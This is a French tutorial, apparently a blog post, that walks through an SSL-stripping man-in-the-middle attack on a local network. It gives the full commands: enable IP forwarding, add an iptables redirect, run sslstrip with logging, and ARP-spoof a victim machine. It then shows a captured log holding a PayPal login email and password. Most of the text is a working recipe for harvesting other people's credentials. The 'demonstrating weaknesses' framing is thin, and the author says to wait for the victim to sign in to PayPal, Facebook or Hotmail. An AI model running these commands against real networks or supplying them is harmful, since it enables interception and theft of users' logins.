Salut à tous ! Je vais vous démontrer les faiblesses du cryptage SSL (https://www.xxxxxx-xxxx.fr). Nous allons utiliser BackTrack (oui je l’aime) !
Étape 1 : Installer les bon outils.
Pour réaliser cette attaque, vous aurez besoin de SslStrip, un petit soft écrit en Python qui permet de rediriger tout le trafic HTTPS de la victime vers du HTTP en donnant l’impression à cette dernière qu’elle se trouve bien sur une page sécurisée (alors qu’elle ne l’est pas).
NOTE : Il faut savoir que la majorité des utilisateurs ne regardent pas l’URL du site WEB sur lequel ils se trouvent. Ainsi en affichant simplement un petit cadenas, l’utilisateur se croit sur une page sécurisée (HTTPS), alors qu’elle ne l’est absolument pas (HTTP)…
Je ne me souviens absolument plus quoi taper dans la Konsole pour installer le soft, donc je préfère vous laisser faire plutôt que vous induire en erreur :)
Étape 2 : La pratique !
On va commencer par activer l’IP forwarding et rediriger le trafic HTTP avec Iptables. Rentrez ceci dans une Konsole :
echo "1" > /proc/sys/net/ipv4/ip_forward
Puis :
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 15000
Ce qui donnerait :
Le trafic HTTP (port 80) est donc redirigé vers le port 15000. C’est donc évidemment sur ce port que SslStrip sera en écoute. Avant de commencer, un petit tour d’horizon des différentes options disponibles avec SslStrip :
sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
Nous allons donc utiliser :
python sslstrip.py -w log.txt -a -l 15000 –f
SslStrip est donc en écoute sur le port 15000 et les informations qui transitent sur le réseau sont enregistrées dans le fichier log.txt.
Maintenant que SslStrip est en écoute sur le réseau, nous allons lancer l’ARP Poinsonning qui va nous metre en situation de MITM (Man In The Midle) sur le réseau. Pour illustrer le MITM, imaginez que vous soyiez entre deux personnes qui parlent, qu’elles ne vous voient pas et que vous entendiez tout ce qu’elles se disent. Si le réseau est switché cela ne pose aucun problem 
Rentrez ceci dans une Konsole :
arpspoof -i eth0 -t 192.168.1.25 192.168.1.1
On peut voir sur cet exemple que la machine victime a l’ip 192.168.1.25 et le routeur est en 192.168.1.1.
Il ne reste plus qu’à attendre que la victime se connecte à un service particulier (PayPal, Facebook, Hotmail…) et rentre ses identifiants et mots de passe. Pendant que lui continuera son surf, l’attaquant récoltera toutes les précieuses informations :
En ouvrant le fichier de log que nous avions nommé log.txt, on peut trouver ceci:
2009-02-28 19:10:33,794 Sending header: content-type: application/x-www-form-urlencoded
2009-02-28 19:10:33,794 SECURE POST Data (www.paypal.com): login_cmd=&login_params=&login_email=test%40test.fr&login_password=super-mot-de-passe&target_page=0&submit.x=Connectez-vous&form_charset=UTF-8&browser_name=Firefox&browser_version=3&operating_system=Windows
2009-02-28 19:10:36,025 Read From Server:
HTTP/1.1 302 Found
Date: Thu, 30 Apr 2009 15:06:12 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_login-submit; domain=.paypal.com; path=/
Set-Cookie: consumer_display=USER_HOMEPAGE%3d2%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d5; expires=Fri, 30-Apr-2010 15:06:14 GMT; domain=.paypal.com; path=/
Set-Cookie: login_email=test%40test.fr; expires=Tue, 27-Oct-2009 15:06:14 GMT; domain=.paypal.com; path=/
Voilà, vous aurez sans aucun doute remarqué le “login_email=test%40test.fr&login_password=super-mot-de-passe”, qui contient, vous l’aurez compris, l’adresse e-mail et le mot de passe.
NOTE : Les images ainsi que l’extrait du fichier log.txt proviennent de http://crack-wifi.com/. C’est d’ailleurs sur ce site que j’ai appris cette technique.